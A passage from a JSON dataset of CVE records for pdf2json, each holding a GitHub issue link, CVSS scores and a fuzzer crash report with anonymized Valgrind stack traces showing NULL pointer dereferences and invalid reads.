NUMBERTAG bytes allocated NUMBERTAG LEAK SUMMARY NUMBERTAG definitely lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG indirectly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG possibly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG still reachable NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG suppressed NUMBERTAG 
bytes in NUMBERTAG blocks NUMBERTAG Rerun with leak check=full to see details of leaked memory NUMBERTAG For counts of detected and suppressed errors, rerun with NUMBERTAG Use track origins=yes to see where uninitialised values come from NUMBERTAG ERROR SUMMARY NUMBERTAG errors from NUMBERTAG contexts (suppressed NUMBERTAG from NUMBERTAG Segmentation fault ~~~ Thanks, Manh Dung",
    "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
    "severity": "MEDIUM",
    "baseScore": 5.5,
    "impactScore": 3.6,
    "exploitabilityScore": 1.8
  },
  {
    "CVE_ID": "CVE-2020-19470",
    "Issue_Url_old": "https://github.com/flexpaper/pdf2json/issues/31",
    "Issue_Url_new": "https://github.com/flexpaper/pdf2json/issues/31",
    "Repo_new": "flexpaper/pdf2json",
    "Issue_Created_At": "2019-05-28T08:53:18Z",
  51449. "description": "Segmentation fault (NULL pointer dereference) on APITAG Hi, Our fuzzer found a crash due to a NULL pointer dereference bug on the function APITAG (the latest commit b NUMBERTAG b NUMBERTAG on master version NUMBERTAG APITAG URLTAG ~~~ valgrind pdf2json APITAG /dev/null NUMBERTAG Memcheck, a memory error detector NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright info NUMBERTAG Command: ./pdf2json APITAG /dev/null NUMBERTAG Error NUMBERTAG Badly formatted number Error: PDF file is damaged attempting to reconstruct xref table... Error NUMBERTAG Illegal character '>' Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Illegal character '>' Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG 
(in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG DF: APITAG , Lexer , int) (in PATHTAG NUMBERTAG by NUMBERTAG F8: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Address NUMBERTAG is not stack'd, malloc'd or (recently) free'd NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGSEG NUMBERTAG Access not within mapped region at address NUMBERTAG at NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG DF: APITAG , Lexer , int) (in PATHTAG NUMBERTAG by NUMBERTAG F8: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG If you believe this happened as a result of a stack NUMBERTAG overflow in your program's main thread (unlikely but 
NUMBERTAG possible), you can try to increase the size of the NUMBERTAG main thread stack using the main stacksize= flag NUMBERTAG The main thread stack size used in this run was NUMBERTAG HEAP SUMMARY NUMBERTAG in use at exit NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG total heap usage NUMBERTAG allocs NUMBERTAG frees NUMBERTAG bytes allocated NUMBERTAG LEAK SUMMARY NUMBERTAG definitely lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG indirectly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG possibly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG still reachable NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG suppressed NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG Rerun with leak check=full to see details of leaked memory NUMBERTAG For counts of detected and suppressed errors, rerun with NUMBERTAG ERROR SUMMARY NUMBERTAG errors from NUMBERTAG contexts (suppressed NUMBERTAG from NUMBERTAG Segmentation fault ~~~ Thanks, Manh Dung",
    "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
    "severity": "MEDIUM",
    "baseScore": 5.5,
    "impactScore": 3.6,
    "exploitabilityScore": 1.8
  },
  {
    "CVE_ID": "CVE-2020-19471",
    "Issue_Url_old": "https://github.com/flexpaper/pdf2json/issues/32",
    "Issue_Url_new": "https://github.com/flexpaper/pdf2json/issues/32",
    "Repo_new": "flexpaper/pdf2json",
    "Issue_Created_At": "2019-05-28T23:23:25Z",
  51462. "description": "Aborted on APITAG Hi, Our fuzzer found a bug due to an invalid read on the function APITAG (the latest commit b NUMBERTAG b NUMBERTAG on master version NUMBERTAG APITAG URLTAG Valgrind says: ~~~ valgrind pdf2json APITAG /dev/null NUMBERTAG Memcheck, a memory error detector NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright info NUMBERTAG Command: ./pdf2json APITAG /dev/null NUMBERTAG Error: PDF file is damaged attempting to reconstruct xref table... Error NUMBERTAG Illegal character APITAG in hex string Error NUMBERTAG Illegal character APITAG in hex string Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Command token too long Error NUMBERTAG Missing 'endstream' Error NUMBERTAG Unknown DCT marker APITAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C6C: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( 
)(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Address NUMBERTAG b5bf NUMBERTAG is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2DB8F: malloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmalloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmallocn (in PATHTAG NUMBERTAG by NUMBERTAG BC5: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C6C: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Address NUMBERTAG b5bf NUMBERTAG is 
NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2DB8F: malloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmalloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmallocn (in PATHTAG NUMBERTAG by NUMBERTAG BC5: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG F: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C6C: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Address NUMBERTAG b5bf NUMBERTAG is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2DB8F: malloc (in PATHTAG NUMBERTAG by 
NUMBERTAG E NUMBERTAG gmalloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmallocn (in PATHTAG NUMBERTAG by NUMBERTAG BC5: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG C: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C6C: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Address NUMBERTAG b5bf1c is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2DB8F: malloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmalloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmallocn (in PATHTAG NUMBERTAG by NUMBERTAG BC5: 
APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG A9: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C6C: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Address NUMBERTAG b5bf NUMBERTAG is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2DB8F: malloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmalloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmallocn (in PATHTAG NUMBERTAG by NUMBERTAG BC5: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG , Object ) (in 
PATHTAG NUMBERTAG by NUMBERTAG CE: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG C6: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C6C: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Address NUMBERTAG b5bf NUMBERTAG is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2DB8F: malloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmalloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmallocn (in PATHTAG NUMBERTAG by NUMBERTAG BC5: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, 
double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG E3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C6C: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Address NUMBERTAG b5bf NUMBERTAG is NUMBERTAG bytes after a block of size NUMBERTAG in arena \"client NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C6C: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, 
Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Address NUMBERTAG b5bf2c is NUMBERTAG bytes after a block of size NUMBERTAG in arena \"client NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG B: APITAG short , int , unsigned char ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C6C: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Address NUMBERTAG feabb is not stack'd, malloc'd or (recently) free'd NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGSEG NUMBERTAG Access not within mapped region at address NUMBERTAG FEABB NUMBERTAG at NUMBERTAG B: APITAG short , int , unsigned char ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C6C: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links 
, int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG If you believe this happened as a result of a stack NUMBERTAG overflow in your program's main thread (unlikely but NUMBERTAG possible), you can try to increase the size of the NUMBERTAG main thread stack using the main stacksize= flag NUMBERTAG The main thread stack size used in this run was NUMBERTAG HEAP SUMMARY NUMBERTAG in use at exit NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG total heap usage NUMBERTAG allocs NUMBERTAG frees NUMBERTAG bytes allocated NUMBERTAG LEAK SUMMARY NUMBERTAG definitely lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG indirectly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG possibly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG still reachable NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG suppressed NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG Rerun with leak check=full to see details of leaked memory NUMBERTAG For counts of detected and suppressed errors, rerun with NUMBERTAG ERROR SUMMARY NUMBERTAG errors from NUMBERTAG contexts (suppressed NUMBERTAG from NUMBERTAG Segmentation fault ~~~ Thanks, Manh Dung",
    "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
    "severity": "MEDIUM",
    "baseScore": 5.5,
    "impactScore": 3.6,
    "exploitabilityScore": 1.8
  },
  {
    "CVE_ID": "CVE-2020-19472",
    "Issue_Url_old": "https://github.com/flexpaper/pdf2json/issues/33",
    "Issue_Url_new": "https://github.com/flexpaper/pdf2json/issues/33",
    "Repo_new": "flexpaper/pdf2json",
    "Issue_Created_At": "2019-05-28T23:35:23Z",
  51475. "description": "Invalid read on APITAG Hi, Our fuzzer found a bug due to an invalid read on the function APITAG (the latest commit b NUMBERTAG b NUMBERTAG on master version NUMBERTAG APITAG URLTAG Valgrind says: ~~~ valgrind pdf2json APITAG /dev/null NUMBERTAG Memcheck, a memory error detector NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright info NUMBERTAG Command: ./pdf2json APITAG /dev/null NUMBERTAG Error: PDF file is damaged attempting to reconstruct xref table... Error NUMBERTAG Illegal character APITAG in hex string Error NUMBERTAG Illegal character APITAG in hex string Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Command token too long Error NUMBERTAG Command token too long Error NUMBERTAG Missing 'endstream NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG A NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG , APITAG , int , int ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by 
